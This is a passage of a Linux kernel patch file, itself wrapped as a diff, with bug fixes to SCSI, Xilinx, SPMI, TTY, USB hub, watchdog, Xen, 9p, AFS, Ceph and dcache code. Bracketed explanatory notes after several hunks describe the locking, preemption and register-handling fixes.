+ 	lockdep_assert_held(shost->host_lock);
+ 
+-	if (scsi_host_busy(shost) == shost->host_failed) {
++	if (busy == shost->host_failed) {
+ 		trace_scsi_eh_wakeup(shost);
+ 		wake_up_process(shost->ehandler);
+ 		SCSI_LOG_ERROR_RECOVERY(5, shost_printk(KERN_INFO, shost,
+@@ -88,7 +88,7 @@ void scsi_schedule_eh(struct Scsi_Host *shost)
+ 	if (scsi_host_set_state(shost, SHOST_RECOVERY) == 0 ||
+ 	    scsi_host_set_state(shost, SHOST_CANCEL_RECOVERY) == 0) {
+ 		shost->host_eh_scheduled++;
+-		scsi_eh_wakeup(shost);
++		scsi_eh_wakeup(shost, scsi_host_busy(shost));
+ 	}
+ 
+ 	spin_unlock_irqrestore(shost->host_lock, flags);
+@@ -281,7 +281,7 @@ static void scsi_eh_inc_host_failed(struct rcu_head *head)
+ 
+ 	spin_lock_irqsave(shost->host_lock, flags);
+ 	shost->host_failed++;
+-	scsi_eh_wakeup(shost);
++	scsi_eh_wakeup(shost, scsi_host_busy(shost));
+ 	spin_unlock_irqrestore(shost->host_lock, flags);
+ }
+ 
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index d25e1c2472538..0e7e9f1e5a029 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -282,7 +282,7 @@ static void scsi_dec_host_busy(struct Scsi_Host *shost, struct scsi_cmnd *cmd)
+ 	if (unlikely(scsi_host_in_recovery(shost))) {
+ 		spin_lock_irqsave(shost->host_lock, flags);
+ 		if (shost->host_failed || shost->host_eh_scheduled)
+-			scsi_eh_wakeup(shost);
++			scsi_eh_wakeup(shost, scsi_host_busy(shost));
+ 		spin_unlock_irqrestore(shost->host_lock, flags);
+ 	}
+ 	rcu_read_unlock();
+diff --git a/drivers/scsi/scsi_priv.h b/drivers/scsi/scsi_priv.h
+index b14545acb40f5..9b5fb30e684be 100644
+--- a/drivers/scsi/scsi_priv.h
++++ b/drivers/scsi/scsi_priv.h
+@@ -86,7 +86,7 @@ extern void scmd_eh_abort_handler(struct work_struct *work);
+ extern enum blk_eh_timer_return scsi_timeout(struct request *req);
+ extern int scsi_error_handler(void *host);
+ extern enum scsi_disposition scsi_decide_disposition(struct scsi_cmnd *cmd);
+-extern void scsi_eh_wakeup(struct Scsi_Host *shost);
++extern void scsi_eh_wakeup(struct Scsi_Host *shost, unsigned int busy);
+ extern void scsi_eh_scmd_add(struct scsi_cmnd *);
+ void scsi_eh_ready_devs(struct Scsi_Host *shost,
+ 			struct list_head *work_q,
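
[Note on the scsi hunks: scsi_eh_wakeup() no longer computes the host-busy count itself under the host lock; each caller now passes in the snapshot it wants compared against shost->host_failed. The comparison is unchanged, but the new parameter decouples the wakeup condition from where the relatively expensive, tag-iterating scsi_host_busy() walk runs relative to acquiring host_lock. The call shape, simplified from scsi_eh_inc_host_failed() above:

    /* Sample the busy count explicitly and let the lock-holding
     * helper compare it against host_failed. */
    spin_lock_irqsave(shost->host_lock, flags);
    shost->host_failed++;
    scsi_eh_wakeup(shost, scsi_host_busy(shost));
    spin_unlock_irqrestore(shost->host_lock, flags);
]
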
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index f9d9b82b562da..8293cc40047fa 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -477,7 +477,7 @@ static void xlnx_call_notify_cb_handler(const u32 *payload)
+ 		}
+ 	}
+ 	if (!is_callback_found)
+-		pr_warn("Didn't find any registered callback for 0x%x 0x%x\n",
++		pr_warn("Unhandled SGI node 0x%x event 0x%x. Expected with Xen hypervisor\n",
+ 			payload[1], payload[2]);
+ }
+ 
+@@ -555,7 +555,7 @@ static void xlnx_disable_percpu_irq(void *data)
+ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ {
+ 	int ret = 0;
+-	int cpu = smp_processor_id();
++	int cpu;
+ 	/*
+ 	 * IRQ related structures are used for the following:
+ 	 * for each SGI interrupt ensure its mapped by GIC IRQ domain
+@@ -592,9 +592,12 @@ static int xlnx_event_init_sgi(struct platform_device *pdev)
+ 	sgi_fwspec.param[0] = sgi_num;
+ 	virq_sgi = irq_create_fwspec_mapping(&sgi_fwspec);
+ 
++	cpu = get_cpu();
+ 	per_cpu(cpu_number1, cpu) = cpu;
+ 	ret = request_percpu_irq(virq_sgi, xlnx_event_handler, "xlnx_event_mgmt",
+ 				 &cpu_number1);
++	put_cpu();
++
+ 	WARN_ON(ret);
+ 	if (ret) {
+ 		irq_dispose_mapping(virq_sgi);
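
[Note on the xlnx_event_manager hunks: two independent fixes. The "didn't find any registered callback" warning is reworded for the benign Xen case, and xlnx_event_init_sgi() stops calling smp_processor_id() from preemptible context, where the result is unstable (and trips CONFIG_DEBUG_PREEMPT), switching to the get_cpu()/put_cpu() pair that disables preemption around the per-CPU access. The idiom, as used in the hunk:

    /* get_cpu() disables preemption and returns the current CPU id;
     * the id stays meaningful until the matching put_cpu(). */
    cpu = get_cpu();
    per_cpu(cpu_number1, cpu) = cpu;
    ret = request_percpu_irq(virq_sgi, xlnx_event_handler,
                             "xlnx_event_mgmt", &cpu_number1);
    put_cpu();
]
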
+diff --git a/drivers/spmi/spmi-mtk-pmif.c b/drivers/spmi/spmi-mtk-pmif.c
+index 01e8851e639d5..bf8c0d4109b19 100644
+--- a/drivers/spmi/spmi-mtk-pmif.c
++++ b/drivers/spmi/spmi-mtk-pmif.c
+@@ -475,7 +475,7 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 	for (i = 0; i < arb->nclks; i++)
+ 		arb->clks[i].id = pmif_clock_names[i];
+ 
+-	err = devm_clk_bulk_get(&pdev->dev, arb->nclks, arb->clks);
++	err = clk_bulk_get(&pdev->dev, arb->nclks, arb->clks);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "Failed to get clocks: %d\n", err);
+ 		goto err_put_ctrl;
+@@ -484,7 +484,7 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 	err = clk_bulk_prepare_enable(arb->nclks, arb->clks);
+ 	if (err) {
+ 		dev_err(&pdev->dev, "Failed to enable clocks: %d\n", err);
+-		goto err_put_ctrl;
++		goto err_put_clks;
+ 	}
+ 
+ 	ctrl->cmd = pmif_arb_cmd;
+@@ -510,6 +510,8 @@ static int mtk_spmi_probe(struct platform_device *pdev)
+ 
+ err_domain_remove:
+ 	clk_bulk_disable_unprepare(arb->nclks, arb->clks);
++err_put_clks:
++	clk_bulk_put(arb->nclks, arb->clks);
+ err_put_ctrl:
+ 	spmi_controller_put(ctrl);
+ 	return err;
+@@ -521,6 +523,7 @@ static int mtk_spmi_remove(struct platform_device *pdev)
+ 	struct pmif *arb = spmi_controller_get_drvdata(ctrl);
+ 
+ 	clk_bulk_disable_unprepare(arb->nclks, arb->clks);
++	clk_bulk_put(arb->nclks, arb->clks);
+ 	spmi_controller_remove(ctrl);
+ 	spmi_controller_put(ctrl);
+ 	return 0;
+diff --git a/drivers/tty/tty_ioctl.c b/drivers/tty/tty_ioctl.c
+index 8767c504b95dd..9d3b237304eae 100644
+--- a/drivers/tty/tty_ioctl.c
++++ b/drivers/tty/tty_ioctl.c
+@@ -859,7 +859,7 @@ int tty_mode_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 			ret = -EFAULT;
+ 		return ret;
+ 	case TIOCSLCKTRMIOS:
+-		if (!capable(CAP_SYS_ADMIN))
++		if (!checkpoint_restore_ns_capable(&init_user_ns))
+ 			return -EPERM;
+ 		copy_termios_locked(real_tty, &kterm);
+ 		if (user_termios_to_kernel_termios(&kterm,
+@@ -876,7 +876,7 @@ int tty_mode_ioctl(struct tty_struct *tty, unsigned int cmd, unsigned long arg)
+ 			ret = -EFAULT;
+ 		return ret;
+ 	case TIOCSLCKTRMIOS:
+-		if (!capable(CAP_SYS_ADMIN))
++		if (!checkpoint_restore_ns_capable(&init_user_ns))
+ 			return -EPERM;
+ 		copy_termios_locked(real_tty, &kterm);
+ 		if (user_termios_to_kernel_termios_1(&kterm,
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 81c8f564cf878..4f181110d00db 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -47,12 +47,18 @@
+ #define USB_VENDOR_TEXAS_INSTRUMENTS		0x0451
+ #define USB_PRODUCT_TUSB8041_USB3		0x8140
+ #define USB_PRODUCT_TUSB8041_USB2		0x8142
+-#define HUB_QUIRK_CHECK_PORT_AUTOSUSPEND	0x01
+-#define HUB_QUIRK_DISABLE_AUTOSUSPEND		0x02
++#define USB_VENDOR_MICROCHIP			0x0424
++#define USB_PRODUCT_USB4913			0x4913
++#define USB_PRODUCT_USB4914			0x4914
++#define USB_PRODUCT_USB4915			0x4915
++#define HUB_QUIRK_CHECK_PORT_AUTOSUSPEND	BIT(0)
++#define HUB_QUIRK_DISABLE_AUTOSUSPEND		BIT(1)
++#define HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL	BIT(2)
+ 
+ #define USB_TP_TRANSMISSION_DELAY	40	/* ns */
+ #define USB_TP_TRANSMISSION_DELAY_MAX	65535	/* ns */
+ #define USB_PING_RESPONSE_TIME		400	/* ns */
++#define USB_REDUCE_FRAME_INTR_BINTERVAL	9
+ 
+ /* Protect struct usb_device->state and ->children members
+  * Note: Both are also protected by ->dev.sem, except that ->state can
+@@ -1904,6 +1910,14 @@ static int hub_probe(struct usb_interface *intf, const struct usb_device_id *id)
+ 		usb_autopm_get_interface_no_resume(intf);
+ 	}
+ 
++	if ((id->driver_info & HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL) &&
++	    desc->endpoint[0].desc.bInterval > USB_REDUCE_FRAME_INTR_BINTERVAL) {
++		desc->endpoint[0].desc.bInterval =
++			USB_REDUCE_FRAME_INTR_BINTERVAL;
++		/* Tell the HCD about the interrupt ep's new bInterval */
++		usb_set_interface(hdev, 0, 0);
++	}
++
+ 	if (hub_configure(hub, &desc->endpoint[0].desc) >= 0) {
+ 		onboard_hub_create_pdevs(hdev, &hub->onboard_hub_devs);
+ 
+@@ -5885,6 +5899,21 @@ static const struct usb_device_id hub_id_table[] = {
+       .idVendor = USB_VENDOR_TEXAS_INSTRUMENTS,
+       .idProduct = USB_PRODUCT_TUSB8041_USB3,
+       .driver_info = HUB_QUIRK_DISABLE_AUTOSUSPEND},
++	{ .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++	  .idVendor = USB_VENDOR_MICROCHIP,
++	  .idProduct = USB_PRODUCT_USB4913,
++	  .driver_info = HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL},
++	{ .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++	  .idVendor = USB_VENDOR_MICROCHIP,
++	  .idProduct = USB_PRODUCT_USB4914,
++	  .driver_info = HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL},
++	{ .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++	  .idVendor = USB_VENDOR_MICROCHIP,
++	  .idProduct = USB_PRODUCT_USB4915,
++	  .driver_info = HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL},
+     { .match_flags = USB_DEVICE_ID_MATCH_DEV_CLASS,
+       .bDeviceClass = USB_CLASS_HUB},
+     { .match_flags = USB_DEVICE_ID_MATCH_INT_CLASS,
+diff --git a/drivers/watchdog/it87_wdt.c b/drivers/watchdog/it87_wdt.c
+index bb11229093966..843f9f8e39177 100644
+--- a/drivers/watchdog/it87_wdt.c
++++ b/drivers/watchdog/it87_wdt.c
+@@ -255,6 +255,7 @@ static struct watchdog_device wdt_dev = {
+ static int __init it87_wdt_init(void)
+ {
+ 	u8  chip_rev;
++	u8 ctrl;
+ 	int rc;
+ 
+ 	rc = superio_enter();
+@@ -313,7 +314,18 @@ static int __init it87_wdt_init(void)
+ 
+ 	superio_select(GPIO);
+ 	superio_outb(WDT_TOV1, WDTCFG);
+-	superio_outb(0x00, WDTCTRL);
++
++	switch (chip_type) {
++	case IT8784_ID:
++	case IT8786_ID:
++		ctrl = superio_inb(WDTCTRL);
++		ctrl &= 0x08;
++		superio_outb(ctrl, WDTCTRL);
++		break;
++	default:
++		superio_outb(0x00, WDTCTRL);
++	}
++
+ 	superio_exit();
+ 
+ 	if (timeout < 1 || timeout > max_units * 60) {
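
[Note on the it87_wdt hunk: on IT8784/IT8786 the watchdog control register carries a bit (bit 3) that firmware may have configured, and the old blind write of 0x00 destroyed it. The fix is a read-modify-write that preserves only that bit:

    ctrl = superio_inb(WDTCTRL);    /* current value, incl. firmware bit 3 */
    ctrl &= 0x08;                   /* keep only the bit we must not own */
    superio_outb(ctrl, WDTCTRL);    /* clear everything else */
]
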
+diff --git a/drivers/xen/gntdev-dmabuf.c b/drivers/xen/gntdev-dmabuf.c
+index 940e5e9e8a54a..335451309566a 100644
+--- a/drivers/xen/gntdev-dmabuf.c
++++ b/drivers/xen/gntdev-dmabuf.c
+@@ -11,6 +11,7 @@
+ #include <linux/kernel.h>
+ #include <linux/errno.h>
+ #include <linux/dma-buf.h>
++#include <linux/dma-direct.h>
+ #include <linux/slab.h>
+ #include <linux/types.h>
+ #include <linux/uaccess.h>
+@@ -50,7 +51,7 @@ struct gntdev_dmabuf {
+ 
+ 	/* Number of pages this buffer has. */
+ 	int nr_pages;
+-	/* Pages of this buffer. */
++	/* Pages of this buffer (only for dma-buf export). */
+ 	struct page **pages;
+ };
+ 
+@@ -484,7 +485,7 @@ out:
+ /* DMA buffer import support. */
+ 
+ static int
+-dmabuf_imp_grant_foreign_access(struct page **pages, u32 *refs,
++dmabuf_imp_grant_foreign_access(unsigned long *gfns, u32 *refs,
+ 				int count, int domid)
+ {
+ 	grant_ref_t priv_gref_head;
+@@ -507,7 +508,7 @@ dmabuf_imp_grant_foreign_access(struct page **pages, u32 *refs,
+ 		}
+ 
+ 		gnttab_grant_foreign_access_ref(cur_ref, domid,
+-						xen_page_to_gfn(pages[i]), 0);
++						gfns[i], 0);
+ 		refs[i] = cur_ref;
+ 	}
+ 
+@@ -529,7 +530,6 @@ static void dmabuf_imp_end_foreign_access(u32 *refs, int count)
+ 
+ static void dmabuf_imp_free_storage(struct gntdev_dmabuf *gntdev_dmabuf)
+ {
+-	kfree(gntdev_dmabuf->pages);
+ 	kfree(gntdev_dmabuf->u.imp.refs);
+ 	kfree(gntdev_dmabuf);
+ }
+@@ -549,12 +549,6 @@ static struct gntdev_dmabuf *dmabuf_imp_alloc_storage(int count)
+ 	if (!gntdev_dmabuf->u.imp.refs)
+ 		goto fail;
+ 
+-	gntdev_dmabuf->pages = kcalloc(count,
+-				       sizeof(gntdev_dmabuf->pages[0]),
+-				       GFP_KERNEL);
+-	if (!gntdev_dmabuf->pages)
+-		goto fail;
+-
+ 	gntdev_dmabuf->nr_pages = count;
+ 
+ 	for (i = 0; i < count; i++)
+@@ -576,7 +570,8 @@ dmabuf_imp_to_refs(struct gntdev_dmabuf_priv *priv, struct device *dev,
+ 	struct dma_buf *dma_buf;
+ 	struct dma_buf_attachment *attach;
+ 	struct sg_table *sgt;
+-	struct sg_page_iter sg_iter;
++	struct sg_dma_page_iter sg_iter;
++	unsigned long *gfns;
+ 	int i;
+ 
+ 	dma_buf = dma_buf_get(fd);
+@@ -624,26 +619,31 @@ dmabuf_imp_to_refs(struct gntdev_dmabuf_priv *priv, struct device *dev,
+ 
+ 	gntdev_dmabuf->u.imp.sgt = sgt;
+ 
+-	/* Now convert sgt to array of pages and check for page validity. */
++	gfns = kcalloc(count, sizeof(*gfns), GFP_KERNEL);
++	if (!gfns) {
++		ret = ERR_PTR(-ENOMEM);
++		goto fail_unmap;
++	}
++
++	/*
++	 * Now convert sgt to array of gfns without accessing underlying pages.
++	 * It is not allowed to access the underlying struct page of an sg table
++	 * exported by DMA-buf, but since we deal with special Xen dma device here
++	 * (not a normal physical one) look at the dma addresses in the sg table
++	 * and then calculate gfns directly from them.
++	 */
+ 	i = 0;
+-	for_each_sgtable_page(sgt, &sg_iter, 0) {
+-		struct page *page = sg_page_iter_page(&sg_iter);
+-		/*
+-		 * Check if page is valid: this can happen if we are given
+-		 * a page from VRAM or other resources which are not backed
+-		 * by a struct page.
+-		 */
+-		if (!pfn_valid(page_to_pfn(page))) {
+-			ret = ERR_PTR(-EINVAL);
+-			goto fail_unmap;
+-		}
++	for_each_sgtable_dma_page(sgt, &sg_iter, 0) {
++		dma_addr_t addr = sg_page_iter_dma_address(&sg_iter);
++		unsigned long pfn = bfn_to_pfn(XEN_PFN_DOWN(dma_to_phys(dev, addr)));
+ 
+-		gntdev_dmabuf->pages[i++] = page;
++		gfns[i++] = pfn_to_gfn(pfn);
+ 	}
+ 
+-	ret = ERR_PTR(dmabuf_imp_grant_foreign_access(gntdev_dmabuf->pages,
++	ret = ERR_PTR(dmabuf_imp_grant_foreign_access(gfns,
+ 						      gntdev_dmabuf->u.imp.refs,
+ 						      count, domid));
++	kfree(gfns);
+ 	if (IS_ERR(ret))
+ 		goto fail_end_access;
+ 
+diff --git a/fs/9p/v9fs_vfs.h b/fs/9p/v9fs_vfs.h
+index bc417da7e9c1d..633fe4f527b84 100644
+--- a/fs/9p/v9fs_vfs.h
++++ b/fs/9p/v9fs_vfs.h
+@@ -46,6 +46,7 @@ struct inode *v9fs_alloc_inode(struct super_block *sb);
+ void v9fs_free_inode(struct inode *inode);
+ struct inode *v9fs_get_inode(struct super_block *sb, umode_t mode,
+ 			     dev_t rdev);
++void v9fs_set_netfs_context(struct inode *inode);
+ int v9fs_init_inode(struct v9fs_session_info *v9ses,
+ 		    struct inode *inode, umode_t mode, dev_t rdev);
+ void v9fs_evict_inode(struct inode *inode);
+diff --git a/fs/9p/vfs_inode.c b/fs/9p/vfs_inode.c
+index 4d1a4a8d92772..5e2657c1dbbe6 100644
+--- a/fs/9p/vfs_inode.c
++++ b/fs/9p/vfs_inode.c
+@@ -250,7 +250,7 @@ void v9fs_free_inode(struct inode *inode)
+ /*
+  * Set parameters for the netfs library
+  */
+-static void v9fs_set_netfs_context(struct inode *inode)
++void v9fs_set_netfs_context(struct inode *inode)
+ {
+ 	struct v9fs_inode *v9inode = V9FS_I(inode);
+ 	netfs_inode_init(&v9inode->netfs, &v9fs_req_ops);
+@@ -344,8 +344,6 @@ int v9fs_init_inode(struct v9fs_session_info *v9ses,
+ 		err = -EINVAL;
+ 		goto error;
+ 	}
+-
+-	v9fs_set_netfs_context(inode);
+ error:
+ 	return err;
+ 
+@@ -377,6 +375,7 @@ struct inode *v9fs_get_inode(struct super_block *sb, umode_t mode, dev_t rdev)
+ 		iput(inode);
+ 		return ERR_PTR(err);
+ 	}
++	v9fs_set_netfs_context(inode);
+ 	return inode;
+ }
+ 
+@@ -479,6 +478,7 @@ static struct inode *v9fs_qid_iget(struct super_block *sb,
+ 		goto error;
+ 
+ 	v9fs_stat2inode(st, inode, sb, 0);
++	v9fs_set_netfs_context(inode);
+ 	v9fs_cache_inode_get_cookie(inode);
+ 	unlock_new_inode(inode);
+ 	return inode;
+diff --git a/fs/9p/vfs_inode_dotl.c b/fs/9p/vfs_inode_dotl.c
+index 5cfa4b4f070f4..e15ad46833e05 100644
+--- a/fs/9p/vfs_inode_dotl.c
++++ b/fs/9p/vfs_inode_dotl.c
+@@ -130,6 +130,7 @@ static struct inode *v9fs_qid_iget_dotl(struct super_block *sb,
+ 		goto error;
+ 
+ 	v9fs_stat2inode_dotl(st, inode, 0);
++	v9fs_set_netfs_context(inode);
+ 	v9fs_cache_inode_get_cookie(inode);
+ 	retval = v9fs_get_acl(inode, fid);
+ 	if (retval)
+diff --git a/fs/afs/callback.c b/fs/afs/callback.c
+index a484fa6428081..90f9b2a46ff48 100644
+--- a/fs/afs/callback.c
++++ b/fs/afs/callback.c
+@@ -110,13 +110,14 @@ static struct afs_volume *afs_lookup_volume_rcu(struct afs_cell *cell,
+ {
+ 	struct afs_volume *volume = NULL;
+ 	struct rb_node *p;
+-	int seq = 0;
++	int seq = 1;
+ 
+ 	do {
+ 		/* Unfortunately, rbtree walking doesn't give reliable results
+ 		 * under just the RCU read lock, so we have to check for
+ 		 * changes.
+ 		 */
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&cell->volume_lock, &seq);
+ 
+ 		p = rcu_dereference_raw(cell->volumes.rb_node);
+diff --git a/fs/afs/server.c b/fs/afs/server.c
+index b5237206eac3e..0bd2f5ba6900c 100644
+--- a/fs/afs/server.c
++++ b/fs/afs/server.c
+@@ -27,7 +27,7 @@ struct afs_server *afs_find_server(struct afs_net *net,
+ 	const struct afs_addr_list *alist;
+ 	struct afs_server *server = NULL;
+ 	unsigned int i;
+-	int seq = 0, diff;
++	int seq = 1, diff;
+ 
+ 	rcu_read_lock();
+ 
+@@ -35,6 +35,7 @@ struct afs_server *afs_find_server(struct afs_net *net,
+ 		if (server)
+ 			afs_unuse_server_notime(net, server, afs_server_trace_put_find_rsq);
+ 		server = NULL;
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&net->fs_addr_lock, &seq);
+ 
+ 		if (srx->transport.family == AF_INET6) {
+@@ -90,7 +91,7 @@ struct afs_server *afs_find_server_by_uuid(struct afs_net *net, const uuid_t *uu
+ {
+ 	struct afs_server *server = NULL;
+ 	struct rb_node *p;
+-	int diff, seq = 0;
++	int diff, seq = 1;
+ 
+ 	_enter("%pU", uuid);
+ 
+@@ -102,7 +103,7 @@ struct afs_server *afs_find_server_by_uuid(struct afs_net *net, const uuid_t *uu
+ 		if (server)
+ 			afs_unuse_server(net, server, afs_server_trace_put_uuid_rsq);
+ 		server = NULL;
+-
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&net->fs_lock, &seq);
+ 
+ 		p = net->fs_servers.rb_node;
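
[Note on the afs hunks: all three fix the same latent bug in the read_seqbegin_or_lock() retry pattern. The helper treats an even seq as "try lockless" and an odd seq as "take the lock for real", and need_seqretry()/done_seqretry() rely on that parity. Initializing seq to 0 and never stepping it meant the loop could spin on the lockless path forever under contention; starting at 1 and incrementing each pass gives an even value (2) on the first, lockless attempt and odd values on every retry, forcing the locked slow path. The loop skeleton (structure being walked elided):

    int seq = 1;

    do {
            seq++;  /* 2 on the first (lockless) pass, odd afterwards */
            read_seqbegin_or_lock(&lock, &seq);
            /* ... walk the data structure under either mode ... */
    } while (need_seqretry(&lock, seq));
    done_seqretry(&lock, seq);
]
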
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 36052a3626830..111938a6307e6 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -4597,12 +4597,14 @@ int ceph_encode_dentry_release(void **p, struct dentry *dentry,
+ 			       struct inode *dir,
+ 			       int mds, int drop, int unless)
+ {
+-	struct dentry *parent = NULL;
+ 	struct ceph_mds_request_release *rel = *p;
+ 	struct ceph_dentry_info *di = ceph_dentry(dentry);
+ 	int force = 0;
+ 	int ret;
+ 
++	/* This shouldn't happen */
++	BUG_ON(!dir);
++
+ 	/*
+ 	 * force an record for the directory caps if we have a dentry lease.
+ 	 * this is racy (can't take i_ceph_lock and d_lock together), but it
+@@ -4612,14 +4614,9 @@ int ceph_encode_dentry_release(void **p, struct dentry *dentry,
+ 	spin_lock(&dentry->d_lock);
+ 	if (di->lease_session && di->lease_session->s_mds == mds)
+ 		force = 1;
+-	if (!dir) {
+-		parent = dget(dentry->d_parent);
+-		dir = d_inode(parent);
+-	}
+ 	spin_unlock(&dentry->d_lock);
+ 
+ 	ret = ceph_encode_inode_release(p, dir, mds, drop, unless, force);
+-	dput(parent);
+ 
+ 	spin_lock(&dentry->d_lock);
+ 	if (ret && di->lease_session && di->lease_session->s_mds == mds) {
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 82874be945248..da9fcf48ab6c0 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -3650,11 +3650,11 @@ static void handle_session(struct ceph_mds_session *session,
+ 		if (session->s_state == CEPH_MDS_SESSION_RECONNECTING)
+ 			pr_info("mds%d reconnect success\n", session->s_mds);
+ 
++		session->s_features = features;
+ 		if (session->s_state == CEPH_MDS_SESSION_OPEN) {
+ 			pr_notice("mds%d is already opened\n", session->s_mds);
+ 		} else {
+ 			session->s_state = CEPH_MDS_SESSION_OPEN;
+-			session->s_features = features;
+ 			renewed_caps(mdsc, session, 0);
+ 			if (test_bit(CEPHFS_FEATURE_METRIC_COLLECT,
+ 				     &session->s_features))
+diff --git a/fs/ceph/quota.c b/fs/ceph/quota.c
+index f7fcf7f08ec64..ca4932e6f71bf 100644
+--- a/fs/ceph/quota.c
++++ b/fs/ceph/quota.c
+@@ -194,10 +194,10 @@ void ceph_cleanup_quotarealms_inodes(struct ceph_mds_client *mdsc)
+ }
+ 
+ /*
+- * This function walks through the snaprealm for an inode and returns the
+- * ceph_snap_realm for the first snaprealm that has quotas set (max_files,
++ * This function walks through the snaprealm for an inode and set the
++ * realmp with the first snaprealm that has quotas set (max_files,
+  * max_bytes, or any, depending on the 'which_quota' argument).  If the root is
+- * reached, return the root ceph_snap_realm instead.
++ * reached, set the realmp with the root ceph_snap_realm instead.
+  *
+  * Note that the caller is responsible for calling ceph_put_snap_realm() on the
+  * returned realm.
+@@ -208,18 +208,19 @@ void ceph_cleanup_quotarealms_inodes(struct ceph_mds_client *mdsc)
+  * this function will return -EAGAIN; otherwise, the snaprealms walk-through
+  * will be restarted.
+  */
+-static struct ceph_snap_realm *get_quota_realm(struct ceph_mds_client *mdsc,
+-					       struct inode *inode,
+-					       enum quota_get_realm which_quota,
+-					       bool retry)
++static int get_quota_realm(struct ceph_mds_client *mdsc, struct inode *inode,
++			   enum quota_get_realm which_quota,
++			   struct ceph_snap_realm **realmp, bool retry)
+ {
+ 	struct ceph_inode_info *ci = NULL;
+ 	struct ceph_snap_realm *realm, *next;
+ 	struct inode *in;
+ 	bool has_quota;
+ 
++	if (realmp)
++		*realmp = NULL;
+ 	if (ceph_snap(inode) != CEPH_NOSNAP)
+-		return NULL;
++		return 0;
+ 
+ restart:
+ 	realm = ceph_inode(inode)->i_snap_realm;
+@@ -245,7 +246,7 @@ restart:
+ 				break;
+ 			ceph_put_snap_realm(mdsc, realm);
+ 			if (!retry)
+-				return ERR_PTR(-EAGAIN);
++				return -EAGAIN;
+ 			goto restart;
+ 		}
+ 
+@@ -254,8 +255,11 @@ restart:
+ 		iput(in);
+ 
+ 		next = realm->parent;
+-		if (has_quota || !next)
+-		       return realm;
++		if (has_quota || !next) {
++			if (realmp)
++				*realmp = realm;
++			return 0;
++		}
+ 
+ 		ceph_get_snap_realm(mdsc, next);
+ 		ceph_put_snap_realm(mdsc, realm);
+@@ -264,7 +268,7 @@ restart:
+ 	if (realm)
+ 		ceph_put_snap_realm(mdsc, realm);
+ 
+-	return NULL;
++	return 0;
+ }
+ 
+ bool ceph_quota_is_same_realm(struct inode *old, struct inode *new)
+@@ -272,6 +276,7 @@ bool ceph_quota_is_same_realm(struct inode *old, struct inode *new)
+ 	struct ceph_mds_client *mdsc = ceph_sb_to_mdsc(old->i_sb);
+ 	struct ceph_snap_realm *old_realm, *new_realm;
+ 	bool is_same;
++	int ret;
+ 
+ restart:
+ 	/*
+@@ -281,9 +286,9 @@ restart:
+ 	 * dropped and we can then restart the whole operation.
+ 	 */
+ 	down_read(&mdsc->snap_rwsem);
+-	old_realm = get_quota_realm(mdsc, old, QUOTA_GET_ANY, true);
+-	new_realm = get_quota_realm(mdsc, new, QUOTA_GET_ANY, false);
+-	if (PTR_ERR(new_realm) == -EAGAIN) {
++	get_quota_realm(mdsc, old, QUOTA_GET_ANY, &old_realm, true);
++	ret = get_quota_realm(mdsc, new, QUOTA_GET_ANY, &new_realm, false);
++	if (ret == -EAGAIN) {
+ 		up_read(&mdsc->snap_rwsem);
+ 		if (old_realm)
+ 			ceph_put_snap_realm(mdsc, old_realm);
+@@ -485,8 +490,8 @@ bool ceph_quota_update_statfs(struct ceph_fs_client *fsc, struct kstatfs *buf)
+ 	bool is_updated = false;
+ 
+ 	down_read(&mdsc->snap_rwsem);
+-	realm = get_quota_realm(mdsc, d_inode(fsc->sb->s_root),
+-				QUOTA_GET_MAX_BYTES, true);
++	get_quota_realm(mdsc, d_inode(fsc->sb->s_root), QUOTA_GET_MAX_BYTES,
++			&realm, true);
+ 	up_read(&mdsc->snap_rwsem);
+ 	if (!realm)
+ 		return false;
+diff --git a/fs/dcache.c b/fs/dcache.c
+index 52e6d5fdab6bd..b09bc88dbbec7 100644
+--- a/fs/dcache.c
++++ b/fs/dcache.c
+@@ -787,12 +787,12 @@ static inline bool fast_dput(struct dentry *dentry)
+ 	 */
+ 	if (unlikely(ret < 0)) {
+ 		spin_lock(&dentry->d_lock);
+-		if (dentry->d_lockref.count > 1) {
+-			dentry->d_lockref.count--;
++		if (WARN_ON_ONCE(dentry->d_lockref.count <= 0)) {
+ 			spin_unlock(&dentry->d_lock);
+ 			return true;
+ 		}
+-		return false;
++		dentry->d_lockref.count--;
++		goto locked;
+ 	}
+ 
+ 	/*
+@@ -850,6 +850,7 @@ static inline bool fast_dput(struct dentry *dentry)
+ 	 * else could have killed it and marked it dead. Either way, we
+ 	 * don't need to do anything else.
+ 	 */
++locked:
+ 	if (dentry->d_lockref.count) {
+ 		spin_unlock(&dentry->d_lock);
+ 		return true;
